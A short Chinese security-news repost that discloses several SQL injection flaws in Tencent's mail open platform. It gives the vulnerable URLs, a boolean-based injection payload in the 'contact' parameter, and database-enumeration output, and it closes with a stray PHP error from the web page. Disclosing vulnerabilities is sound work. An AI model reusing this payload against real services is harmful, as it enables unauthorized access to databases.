腾讯邮箱开放平台多处SQL注入漏洞

华盟君华盟君 安全资讯,最新资讯,黑客技术 8年前
4.17W 0
华盟原创文章投稿奖励计划

         腾讯邮箱开放平台多处SQL注入漏洞

  腾讯邮箱开放平台多处SQL注入漏洞

  他域互通删除IP处http://open.mail.qq.com/cgi-bin/communication?sid=DIBFyfQ1kYxvlhhN&t=open_communication&action=delip&ip=1.1.1.1&ef=js&resp_charset=UTF8ip处企业登记资料,修改处http://open.mail.qq.com/cgi-bin/communication?s=communication&sid=DIBFyfQ1kYxvlhhN&t=open_communication&POSTaction=changecompany&contact=%C6%F3%D2%B5%C3%FB%B3%C6%3B'%2b(if((1=1),1,(select 1 union select 2)))%2b'a&phone1=233&phone2=3333333&phone3=33contact参数其它就不找了,所到之处基本都是呀。

         腾讯邮箱开放平台多处SQL注入漏洞

  available databases [5]:

  [*] domain_interflow

  [*] feedbackloop

  [*] information_schema

  [*] mysql

  [*] test

  解决方案:

  过滤 

原文地址:https://hack.77169.com/201510/214213.shtm

本文原创,作者:华盟君,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/20498.html
华盟君官方
华盟君

3.38K篇文章
Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 16384 bytes) in /data/wwwroot/www.77169.net/wp-includes/wp-db.php on line 2022